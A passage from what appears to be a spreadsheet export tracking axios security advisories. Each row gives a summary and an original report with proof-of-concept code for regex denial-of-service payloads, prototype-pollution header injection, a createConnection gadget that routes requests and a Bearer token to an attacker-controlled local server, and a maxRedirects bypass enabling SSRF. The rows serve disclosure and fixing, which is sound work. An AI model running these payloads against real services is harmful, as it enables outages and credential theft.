Applications are affected when they pass untrusted URL strings to axios and do not reject or constrain `data:` URLs before axios parses them.
## Impact
An attacker can make the Node.js event loop spend significant synchronous CPU time parsing a single malformed URL. In a server that accepts a URL from an HTTP request and calls `axios.get(url)`, this can block unrelated requests and health checks until parsing completes.
The issue is availability-only. It does not disclose data or modify requests.
## Affected Functionality
Affected:
- Node.js HTTP adapter data URL handling.
- `axios.get()` or equivalent calls where `config.url` has the `data:` protocol.
Not affected:
- Browser fetch/XHR URL handling.
- Node requests where the application rejects `data:` URLs before calling axios.
- Older checked `0.x` data URL parser shape unless separately proven vulnerable.
## Technical Details
`lib/helpers/fromDataURI.js` contains:
```js
const DATA_URL_PATTERN = /^([^,;]+\/[^,;]+)?((?:;[^,;=]+=[^,;]+)*)(;base64)?,([\s\S]*)$/;
```
The `[^,;]+` groups include `/`, so a long string of slashes without a comma can be partitioned around the required `\/` in many ways before the match fails. The match runs before axios can apply request timeout behavior, so `timeout` does not mitigate the parsing pause.
Local timing on axios `1.18.1` with small payloads showed about 2.4 ms at 1000 slashes, 16.6 ms at 3000 slashes, and 71.5 ms at 6000 slashes, consistent with the submitted quadratic scaling while avoiding long-running payloads.
## Proof of Concept of Attack
Constrained helper-level demonstration:
```js
import axios from 'axios';
await axios.get('data:' + '/'.repeat(6000));
```
The request fails after parsing, but the failure is delayed by synchronous regex work. Larger payloads increase the pause substantially.
## Workarounds
Reject `data:` URLs before passing untrusted input to axios, or enforce a strict maximum URL length for URL-fetching endpoints. Applications that do not need `data:` URL support should deny that protocol explicitly.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
# ReDoS in `fromDataURI` data: URL parser freezes the event loop (DoS)
## Affected
- Package: `axios` (Node.js http adapter)
- Versions: 1.x (regex present on `v1.x`, current release line)
- File: `lib/helpers/fromDataURI.js`
- CWE-1333 (Inefficient Regular Expression Complexity)
## Issue
`fromDataURI` parses `data:` URLs with this regex:
```js
// lib/helpers/fromDataURI.js:9
const DATA_URL_PATTERN = /^([^,;]+\/[^,;]+)?((?:;[^,;=]+=[^,;]+)*)(;base64)?,([\s\S]*)$/;
```
The mediatype tokens `[^,;]+` include `/`, so they can span multiple slashes ambiguously. A `data:` URL made of many slashes with no comma forces the engine to try every way to place the single `\/` divider before failing — quadratic O(n²) backtracking. It runs synchronously on the main thread, so the whole Node event loop is frozen for the entire parse. Reachable through the public API on the Node http adapter (`axios.get(url)`); the browser fetch/xhr adapters are not affected because they do not call `fromDataURI`.
A configured `timeout` does not help: the freeze happens during parsing, before any network timer can fire.
## PoC (minimal)
```js
import axios from 'axios';
// ~256 KB data: URL of pure slashes, no comma
await axios.get('data:' + '/'.repeat(262139)); // blocks the event loop ~6 min, then throws
```
## Lab results
Single-threaded "fetch a user-supplied URL" service (link-preview style) calling `axios.get` on a JSON body `{ "url": "..." }`, with `timeout: 1000` set.
Scaling is clean O(n²) (constant k ≈ 5.6e-6 ms/byte², stable across sizes):
| data: URL size | Event-loop freeze (one request) |
| --- | --- |
| 32 KB | 6.3 s (measured end-to-end; server logged `event loop BLOCKED for 6.30s`) |
| 64 KB | ~24 s |
| 128 KB | ~96 s |
| 256 KB | ~385 s (~6.4 min) |
| 1 MB | ~100 min |
During the freeze the server answers nothing: a `/healthz` liveness probe times out for the whole window, and the server's own event-loop monitor cannot even log until the parse finishes. In a run through an intercepting proxy, the proxy hit its 120 s upstream timeout and gave up, while the origin stayed pegged at 100% CPU on one core past that — client/proxy timeouts do not mitigate it.
The attacker controls only the URL string and needs no auth. ~256 KB every ~6 min (≈ 0.7 bytes/sec) keeps a server permanently unavailable.
## Impact
Unauthenticated remote denial of service. One small request takes a Node service fully offline for minutes; a trickle keeps it down indefinitely.
CVSS 3.1: 7.5 (High) — `AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`.
## Fix
RFC 2045 type/subtype tokens never contain `/`. Excluding `/` from those two character classes removes the ambiguity and the backtracking:
```js
const DATA_URL_PATTERN = /^([^,;/]+\/[^,;/]+)?((?:;[^,;=]+=[^,;]+)*)(;base64)?,([\s\S]*)$/;
```
Worst-case parse drops from ~2600 ms to ~0.002 ms. All valid `data:` URLs, including slashes in the body, parse identically.
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T600" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101903</t>
        </is>
      </c>
    </row>
    <row r="601">
      <c r="A601" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B601" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C601" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101904</t>
        </is>
      </c>
      <c r="D601" s="5" t="inlineStr"/>
      <c r="E601" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F601" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G601" s="5" t="inlineStr"/>
      <c r="H601" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I601" s="5" t="inlineStr"/>
      <c r="J601" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K601" s="5" t="inlineStr"/>
      <c r="L601" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M601" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N601" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O601" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P601" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q601" s="5" t="inlineStr"/>
      <c r="R601" s="5" t="inlineStr"/>
      <c r="S601" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios request interceptors may return a replacement config object. If an interceptor returns a plain object without an own `headers` property, `dispatchRequest()` later evaluates `config.headers` and can resolve an inherited `Object.prototype.headers` value. In a process where another vulnerability has polluted `Object.prototype.headers`, axios can send attacker-controlled headers.
Axios does not create the prototype pollution source, and the interceptor itself is trusted caller code. The vulnerable behavior is the post-interceptor axios config read that reopens a prototype-pollution gadget after earlier null-prototype config hardening.
## Impact
An attacker with a prior same-process prototype-pollution primitive can inject headers into affected axios requests when the application uses an interceptor that rebuilds config and omits headers. Depending on the target service, injected headers can affect cache behavior, conditional requests, metadata services, or application-specific authorization and routing logic.
The issue is conditional and should not be described as affecting every interceptor or every request.
## Affected Functionality
Affected:
- Request interceptor chains where an interceptor returns a new ordinary object.
- Replacement config objects that omit an own `headers` property.
- `dispatchRequest()` header normalization through `AxiosHeaders.from(config.headers)`.
Not affected:
- Requests whose interceptor preserves an own `headers` property.
- Interceptors that mutate and return the existing null-prototype config.
- Processes without prototype pollution.
## Technical Details
`lib/core/dispatchRequest.js` contains:
```js
config.headers = AxiosHeaders.from(config.headers);
```
The initial merged config is null-prototype, but an interceptor can replace it with a normal object. If that object has no own `headers`, the read can resolve `Object.prototype.headers`.
Local verification on axios `1.18.1` polluted `Object.prototype.headers = { 'X-Poisoned': 'yes' }`, installed an interceptor that returned `{ url, method, timeout, proxy: false }`, and sent a request. The loopback server received `X-Poisoned: yes`.
## Proof of Concept of Attack
Constrained local demonstration:
```js
Object.prototype.headers = { 'X-Poisoned': 'yes' };
const client = axios.create();
client.interceptors.request.use((config) =&gt; ({
  url: config.url,
  method: config.method,
  timeout: config.timeout
}));
await client.get(url);
```
Expected safe behavior is that missing headers normalize to an empty header set. Current affected behavior reads inherited `Object.prototype.headers`.
## Workarounds
Interceptors that rebuild config should always set an own `headers` property, for example by preserving `config.headers` or setting `headers: {}`. Mutating and returning the existing merged config also avoids replacing the null-prototype object.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
## Summary
Axios 1.17.0 blocks the old `Object.prototype.common` header bucket gadget. However, if a request interceptor rebuilds a minimal config object and omits `headers`, `dispatchRequest()` reads inherited `Object.prototype.headers`.
This allows attacker-controlled headers to be placed on the wire.
## Affected Version
Validated on:
- axios: `1.17.0`
- commit: `4306df2`
- runtime: Node.js `v24.15.0`
## Preconditions
- A separate prototype-pollution primitive can write an object to `Object.prototype.headers`.
- A request interceptor rebuilds config and omits own `headers`.
## Root Cause
`dispatchRequest()` uses:
```js
config.headers = AxiosHeaders.from(config.headers);
```
If `config` is a normal object returned by an interceptor and lacks own `headers`, this reads `Object.prototype.headers`.
## Impact
An attacker can inject request headers. Depending on the target service, this can cause cache manipulation, conditional-response suppression, request smuggling preconditions, metadata-service header injection, or application-specific authorization bypass.
## Proof of Concept
```js
import axios from './index.js';
import http from 'http';
const start = (handler) =&gt; new Promise((resolve) =&gt; {
  const server = http.createServer(handler);
  server.listen(0, '127.0.0.1', () =&gt; resolve(server));
});
const stop = (server) =&gt; new Promise((resolve) =&gt; server.close(resolve));
const hits = [];
const server = await start((req, res) =&gt; {
  hits.push(req.headers);
  res.setHeader('Content-Type', 'application/json');
  res.end('{"ok":true}');
});
try {
  Object.prototype.headers = {
    'X-Poisoned': 'yes',
    'If-None-Match': '*'
  };
  const client = axios.create();
  client.interceptors.request.use((config) =&gt; ({
    url: config.url,
    method: config.method,
    timeout: config.timeout
  }));
  await client.get(`http://127.0.0.1:${server.address().port}/headers`, {
    timeout: 3000
  });
  console.log(hits[0]);
} finally {
  delete Object.prototype.headers;
  await stop(server);
}
```
Observed wire headers:
```json
{
  "x-poisoned": "yes",
  "if-none-match": "*",
  "user-agent": "axios/1.17.0"
}
```
## References
- https://github.com/axios/axios/security/advisories/GHSA-898c-q2cr-xwhg
- https://osv.dev/vulnerability/GHSA-898c-q2cr-xwhg
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T601" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101904</t>
        </is>
      </c>
    </row>
    <row r="602">
      <c r="A602" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B602" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C602" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101905</t>
        </is>
      </c>
      <c r="D602" s="5" t="inlineStr"/>
      <c r="E602" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F602" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G602" s="5" t="inlineStr"/>
      <c r="H602" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I602" s="5" t="inlineStr"/>
      <c r="J602" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K602" s="5" t="inlineStr"/>
      <c r="L602" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M602" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N602" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O602" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P602" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q602" s="5" t="inlineStr"/>
      <c r="R602" s="5" t="inlineStr"/>
      <c r="S602" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios' Node HTTP adapter can act as a read-side prototype-pollution gadget for Node's sensitive `createConnection` request option. The adapter creates a null-prototype options object, but Node's HTTP client can copy or normalize request options into ordinary objects before connection creation. If `Object.prototype.createConnection` has been polluted elsewhere in the same process, Node can call the inherited function and create a socket to an attacker-controlled endpoint.
Axios does not create the prototype pollution source. The vulnerability is that axios does not set an own safe value for a sensitive transport option before handing options to Node.
## Impact
Given a prior same-process prototype-pollution primitive, an attacker can redirect later axios Node HTTP requests at the socket layer while the request URL and axios config still appear to target the legitimate origin. The attacker-controlled endpoint can receive request headers and bodies, including Authorization headers, cookies, API keys, and service credentials, and can return attacker-controlled responses to the application.
This can bypass application destination validation that checks the URL before calling axios, because the URL remains legitimate while the underlying socket goes elsewhere.
## Affected Functionality
Affected:
- Node.js HTTP adapter.
- HTTP and HTTPS request paths that rely on Node/follow-redirects option processing and do not set an own safe `createConnection`.
- Processes where `Object.prototype.createConnection` is polluted.
Not affected:
- Browser adapters.
- Processes without prototype pollution.
- Requests using a custom trusted transport that ignores inherited `createConnection` and sanitizes options internally.
## Technical Details
`lib/adapters/http.js` creates:
```js
const options = Object.assign(Object.create(null), {
  path,
  method,
  headers,
  agents: { http: httpAgent, https: httpsAgent },
  auth,
  protocol,
  family,
  beforeRedirect: dispatchBeforeRedirect,
  beforeRedirects: Object.create(null),
  http2Options,
});
```
The object does not include an own `createConnection` property. Local verification on axios `1.18.1` polluted `Object.prototype.createConnection` to connect to an attacker loopback server. A request to a legitimate loopback server with an Authorization header returned the attacker's response; the legitimate server received no request and the attacker server received `Bearer SECRET`.
## Proof of Concept of Attack
Constrained local demonstration:
```js
Object.prototype.createConnection = function (_options, cb) {
  const socket = net.createConnection({ host: '127.0.0.1', port: attackerPort }, () =&gt; {
    if (typeof cb === 'function') cb(null, socket);
  });
  return socket;
};
await axios.get('http://127.0.0.1:&lt;legit-port&gt;/secret', {
  headers: { Authorization: 'Bearer SECRET' },
  proxy: false
});
```
Expected safe behavior is that the legitimate server receives the request. Current affected behavior lets the attacker server receive the request and return the response.
## Workarounds
Run axios in a process where prototype pollution is not present. For high-risk internal clients, use a custom trusted transport or agent layer that sets and enforces its own connection creation behavior instead of allowing inherited Node request options to participate.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
## Summary
Axios' Node HTTP adapter remains exploitable as a read-side prototype-pollution gadget after the recent null-prototype hardening. This is not a claim that axios creates the prototype pollution source. The precondition is a separate upstream prototype pollution primitive in the same Node.js process.
When `Object.prototype.createConnection` is polluted, axios requests can be redirected to an attacker-controlled socket even though the adapter builds the request options with `Object.create(null)`. The request URL and axios config still appear to target the legitimate host, but the actual socket is attacker-controlled.
This allows credential exfiltration and response manipulation for later axios HTTP requests in a polluted process.
## Impact
Given an upstream prototype pollution primitive in the same process, an attacker can turn later axios HTTP requests into a man-in-the-middle primitive:
- redirect the underlying socket for axios requests to attacker-controlled infrastructure
- receive headers and request bodies intended for the legitimate target, including bearer tokens, cookies, API keys, and service credentials
- return attacker-controlled responses to the caller
- bypass application SSRF controls that validate the URL before calling axios, because the requested URL remains legitimate while the socket connects elsewhere
The important boundary here is axios' documented/read-side prototype-pollution hardening. The project threat model discusses polluted `Object.prototype` from transitive dependencies as an in-scope read-side gadget class where axios should avoid picking up inherited behavior-changing properties. This issue is a bypass of that hardening at the Node HTTP request-options boundary.
## Technical details
The HTTP adapter constructs a null-prototype request options object before calling the selected transport:
```js
const options = Object.assign(Object.create(null), {
  path,
  method: method,
  headers: toByteStringHeaderObject(headers),
  agents: { http: config.httpAgent, https: config.httpsAgent },
  auth,
  protocol,
  family,
  beforeRedirect: dispatchBeforeRedirect,
  beforeRedirects: Object.create(null),
  http2Options,
});
```
That prevents direct inherited reads while the options object remains null-prototype. However, Node's HTTP client path copies or normalizes request options into ordinary objects before connection creation. After that copy, missing properties can resolve from `Object.prototype` again.
`createConnection` is a sensitive Node HTTP option. If it is inherited after this copy, Node calls the attacker-supplied function to create the socket.
## Reproduction
The following minimal proof uses a legitimate target server and an attacker server. It pollutes `Object.prototype.createConnection`, then makes an axios request to the legitimate server with an Authorization header.
```js
import net from 'node:net';
import http from 'node:http';
import axios from 'axios';
function listen(handler) {
  return new Promise(resolve =&gt; {
    const s = http.createServer(handler);
    s.listen(0, '127.0.0.1', () =&gt; resolve(s));
  });
}
const legitHits = [];
const attackerHits = [];
const legit = await listen((req, res) =&gt; {
  legitHits.push({url: req.url, auth: req.headers.authorization || null});
  res.end('LEGIT');
});
const attacker = await listen((req, res) =&gt; {
  attackerHits.push({url: req.url, auth: req.headers.authorization || null});
  res.end('ATTACKER');
});
Object.prototype.createConnection = function(options, cb) {
  const sock = net.createConnection({
    host: '127.0.0.1',
    port: attacker.address().port,
  }, () =&gt; {
    if (typeof cb === 'function') cb(null, sock);
  });
  return sock;
};
const res = await axios.get(`http://127.0.0.1:${legit.address().port}/secret`, {
  headers: {Authorization: 'Bearer SECRET'},
  proxy: false,
});
console.log({
  response: res.data,
  legitHits,
  attackerHits,
});
```
Observed result on the current npm package:
```json
{
  "response": "ATTACKER",
  "legitHits": [],
  "attackerHits": [
    {
      "url": "/secret",
      "auth": "Bearer SECRET"
    }
  ]
}
```
The request never reached the intended target. The attacker-controlled server received the Authorization header and supplied the response body returned by axios.
## Versions tested
I reproduced this against:
- axios 1.16.1 from npm
- axios 1.17.0 from npm
- current `v1.x` source at commit `a8e4f13aeecc45a3b8fab3ecfd9ddb5d70fb772b`
## Fix validation
Adding an own safe value for `createConnection` to the adapter options object prevents inherited pollution from being observed after Node's option copy:
```js
const options = Object.assign(Object.create(null), {
  path,
  method: method,
  headers: toByteStringHeaderObject(headers),
  agents: { http: config.httpAgent, https: config.httpsAgent },
  auth,
  protocol,
  family,
  beforeRedirect: dispatchBeforeRedirect,
  beforeRedirects: Object.create(null),
  http2Options,
  createConnection: undefined,
});
```
With that guard in place, the same proof no longer calls the polluted function. The legitimate server receives the request, the attacker server receives nothing, and axios returns the legitimate response.
## Remediation
Set own safe defaults for sensitive Node HTTP request options before calling `transport.request`, at minimum:
```js
createConnection: undefined
```
I recommend reviewing other sensitive Node HTTP options that may be read after Node copies the request options into a normal object, especially connection/TLS-affecting fields such as `lookup`, `timeout`, `localAddress`, `servername`, `signal`, and related options.
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T602" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101905</t>
        </is>
      </c>
    </row>
    <row r="603">
      <c r="A603" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B603" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C603" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101906</t>
        </is>
      </c>
      <c r="D603" s="5" t="inlineStr"/>
      <c r="E603" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F603" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G603" s="5" t="inlineStr"/>
      <c r="H603" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I603" s="5" t="inlineStr"/>
      <c r="J603" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K603" s="5" t="inlineStr"/>
      <c r="L603" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M603" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N603" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O603" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P603" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q603" s="5" t="inlineStr"/>
      <c r="R603" s="5" t="inlineStr"/>
      <c r="S603" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios `shouldBypassProxy()` normalizes hostnames with `hostname.replace(/\.+$/, '')`. For a hostname shaped as many dots followed by a non-dot, the anchored regex can perform quadratic backtracking. Because axios re-evaluates proxy bypass rules for redirected requests, a malicious server can trigger this synchronous work through a crafted redirect `Location`.
The issue affects Node.js applications that use environment proxy variables with `NO_PROXY` and allow redirects.
## Impact
An attacker-controlled server can return a redirect whose hostname causes the axios process to spend significant CPU time in synchronous hostname normalization. During this time, the Node.js event loop is blocked and the application cannot handle other work on that thread.
This is an availability-only issue. It does not disclose request data or modify requests.
## Affected Functionality
Affected:
- Node.js HTTP adapter.
- Environment proxy handling through `HTTP_PROXY` or `HTTPS_PROXY`.
- `NO_PROXY` or `no_proxy` set to a non-empty value.
- Redirects followed by axios or `follow-redirects`.
Not affected:
- Browser adapters.
- Requests with `proxy: false`.
- Requests with no `NO_PROXY` value.
- Requests with `maxRedirects: 0`, unless application code manually follows the malicious redirect and re-enters axios.
## Technical Details
`lib/helpers/shouldBypassProxy.js` contains:
```js
return unmapIPv4MappedIPv6(hostname.replace(/\.+$/, ''));
```
When the hostname is `"." * n + "a"`, the `$` anchor causes the regex engine to retry the dot run from many positions before it fails. `setProxy()` invokes `shouldBypassProxy(location)` after `getProxyForUrl(location)` returns a proxy, including on redirect hops via `beforeRedirects.proxy`.
Local timing on axios `1.18.1` showed increasing cost for crafted hostnames: about 1 ms at 1000 dots, 6.9 ms at 3000 dots, and 34.5 ms at 6000 dots. The growth is consistent with the submitted quadratic claim while avoiding long-running payloads.
## Proof of Concept of Attack
Constrained helper-level demonstration:
```js
import shouldBypassProxy from 'axios/lib/helpers/shouldBypassProxy.js';
process.env.NO_PROXY = 'example.com';
shouldBypassProxy('http://' + '.'.repeat(6000) + 'a/');
```
In the full adapter path, a malicious server can return that hostname in a `302 Location` header while the client has proxy environment variables and `NO_PROXY` configured.
## Workarounds
Disable automatic redirects for requests to untrusted servers, or avoid environment proxy handling for those requests with `proxy: false` when appropriate. Operators can also avoid broad untrusted redirect-following in services where event-loop availability is critical.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
### Summary
shouldBypassProxy normalizes a host with hostname.replace(/\.+$/, ''). On a host of the shape &lt;many dots&gt;&lt;non-dot&gt; (e.g. "." × 40000 + "a"), this anchored regex backtracks quadratically (O(N²)), synchronously starving the Node.js event loop. Because axios re-evaluates the proxy on every redirect using the new Location host, a malicious server can return a crafted 302 Location and freeze the client's event loop for seconds per redirect — a denial of service.
### Details
- Affected code: lib/helpers/shouldBypassProxy.js → normalizeNoProxyHost: hostname.replace(/\.+$/, '') (one pass in 1.18.1). The open PR #11029 adds a second /\.+$/ pass in normalizeIPAddress, doubling the cost (not the origin).
- Root cause: /\.+$/ is O(N²) on a long run of dots that is not at the end of the string — the $ anchor forces the engine to backtrack the entire dot-run from every start position.
- Trust boundary (per THREATMODEL): the redirect Location is untrusted (T-2: "axios to network … redirect Location … untrusted"). The caller requests a benign URL; the malicious host arrives via the server's 302. This is not the T-1 caller-supplied-URL non-goal.
- Call chain: setProxy(options, configProxy, location, isRedirect, …) (lib/adapters/http.js) → env-proxy branch → getProxyForUrl(location) returns a proxy → if (!shouldBypassProxy(location)) → normalizeNoProxyHost(parsed.hostname.toLowerCase()) runs /\.+$/. setProxy is re-invoked on the redirect hop with the untrusted Location; new URL() retains the long dot-run in .hostname.
- Preconditions: proxy configured via environment (HTTP_PROXY/HTTPS_PROXY, trusted per THREATMODEL T-3, common in CI/containers/enterprise) + NO_PROXY set + redirects followed (default maxRedirects: 5).
### PoC
Self-contained, no network — imports axios's own helper:
// node poc.mjs   (run next to an axios install)
import sbp from './node_modules/axios/lib/helpers/shouldBypassProxy.js';
process.env.NO_PROXY = 'example.com';
for (const n of [5000, 10000, 20000, 40000]) {
  const url = 'http://' + '.'.repeat(n) + 'a/';   // arrives as an untrusted 302 Location host
  const t0 = process.hrtime.bigint();
  sbp(url);                                         // returns false (correct no-bypass) — but O(N^2) slow
  console.log(`N=${n}: ${(Number(process.hrtime.bigint()-t0)/1e6)|0} ms`);
}
// Measured on 1.18.1: N=5000 ~43ms, 10000 ~160ms, 20000 ~618ms, 40000 ~2499ms; benign host ~0.05ms.
Driven through the real http-adapter __setProxy on the redirect path (setProxy(…, isRedirect=true)), a 10 ms timer fires 0 times during the ~2.4 s block at N=40000 — full event-loop starvation.
### Impact
Denial of service (event-loop starvation) on any axios client that uses an environment proxy with NO_PROXY set and follows redirects, when a server it contacts returns a crafted redirect Location. No data exposure or RCE. Same impact class as the accepted DoS advisories GHSA-62hf-57xw-28j9 (toFormData recursion) and the maxContentLength response-size DoS.
### Suggested fix
Replace the regex trailing-dot strip with a linear trim:
let end = hostname.length;
while (end &gt; 0 &amp;&amp; hostname.charCodeAt(end - 1) === 46 /* '.' */) end--;
hostname = hostname.slice(0, end);
Also drop the redundant second /\.+$/ pass in PR #11029's normalizeIPAddress.
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T603" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101906</t>
        </is>
      </c>
    </row>
    <row r="604">
      <c r="A604" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B604" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C604" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101907</t>
        </is>
      </c>
      <c r="D604" s="5" t="inlineStr"/>
      <c r="E604" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F604" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G604" s="5" t="inlineStr"/>
      <c r="H604" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I604" s="5" t="inlineStr"/>
      <c r="J604" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K604" s="5" t="inlineStr"/>
      <c r="L604" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M604" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N604" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O604" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P604" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q604" s="5" t="inlineStr"/>
      <c r="R604" s="5" t="inlineStr"/>
      <c r="S604" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios exposes `maxRedirects` to limit redirect following, and `maxRedirects: 0` is used by applications as a redirect-based SSRF guard. The Node HTTP adapter enforces this option. The fetch adapter does not read it and does not set a Fetch API `redirect` mode, so the runtime default of `redirect: 'follow'` applies.
Applications are affected when they rely on `maxRedirects: 0` and use the fetch adapter, either explicitly or because the runtime selects it.
## Impact
An attacker who controls the initial URL or a redirecting server can cause a fetch-adapter request to follow a redirect even though the caller configured `maxRedirects: 0`. If the redirect target is reachable only from the application environment, this can expose internal responses or trigger state-changing internal endpoints.
This should not be described as unconditional SSRF. The bypass requires a redirect source, such as an attacker-controlled server or open redirect, and an application that trusted `maxRedirects: 0` as the redirect guard.
## Affected Functionality
Affected:
- `adapter: 'fetch'`.
- Runtime environments where fetch is selected by adapter resolution.
- Requests configured with `maxRedirects: 0` but without `fetchOptions.redirect: 'manual'` or equivalent runtime-specific redirect control.
Not affected:
- Node HTTP adapter, which enforces `maxRedirects: 0`.
- Requests that do not follow redirects in the underlying fetch implementation because the caller explicitly configured fetch redirect behavior.
## Technical Details
`lib/adapters/fetch.js` destructures many fields from `resolveConfig(config)`, but not `maxRedirects`. It then builds fetch options without a `redirect` key:
```js
const resolvedOptions = {
  ...fetchOptions,
  signal: composedSignal,
  method: method.toUpperCase(),
  headers: toByteStringHeaderObject(headers.normalize()),
  body: data,
  duplex: 'half',
  credentials: isCredentialsSupported ? withCredentials : undefined,
};
```
Because `redirect` is absent, the Fetch API default is to follow redirects.
Local verification on axios `1.18.1` showed the HTTP adapter throwing with `maxRedirects: 0`, while the fetch adapter followed the same loopback `302` and returned the internal response.
## Proof of Concept of Attack
Constrained local demonstration:
1. Start server A that returns `302 Location: http://127.0.0.1:&lt;server-b&gt;/internal`.
2. Start server B that returns `INTERNAL`.
3. Compare:
```js
await axios.get(serverA, { adapter: 'http', maxRedirects: 0 });  // throws
await axios.get(serverA, { adapter: 'fetch', maxRedirects: 0 }); // returns INTERNAL
```
## Workarounds
For fetch-adapter requests, set `fetchOptions: { redirect: 'manual' }` where the runtime supports it, or use the Node HTTP adapter for requests that rely on axios redirect limits.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
## Summary
Axios 1.17.0 exposes `maxRedirects` as a configuration option to limit redirect following, and setting it to `0` is a documented pattern for preventing redirect-based SSRF. The HTTP adapter enforces this via `follow-redirects`. The fetch adapter does not read `maxRedirects` at all - it passes requests to the underlying `fetch()` call with no `redirect` option, which defaults to `'follow'`, so redirects are followed by the runtime rather than being constrained by axios `maxRedirects`.
In the attached PoC, a request issued with `maxRedirects: 0` and `adapter: 'fetch'` follows a `302` redirect to an internal service and returns its response, while the same request with `adapter: 'http'` correctly throws. A second bypass case demonstrates that the redirect can reach a state-changing internal endpoint, not just read-only ones, proving both confidentiality and integrity impact.
This affects any application that sets `maxRedirects: 0` as a redirect guard and runs in an environment where the fetch adapter is active: Deno, Bun, Cloudflare Workers, or Node.js with `adapter: 'fetch'` set explicitly.
## Details
The fetch adapter destructures config fields from `resolveConfig` at `lib/adapters/fetch.js`:
```js
let {
  url, method, data, signal, cancelToken, timeout,
  onDownloadProgress, onUploadProgress, responseType,
  headers, withCredentials, fetchOptions,
  maxContentLength, maxBodyLength,
} = resolveConfig(config);
// maxRedirects is not extracted
```
The options object passed to `fetch()` has no `redirect` key:
```js
const resolvedOptions = {
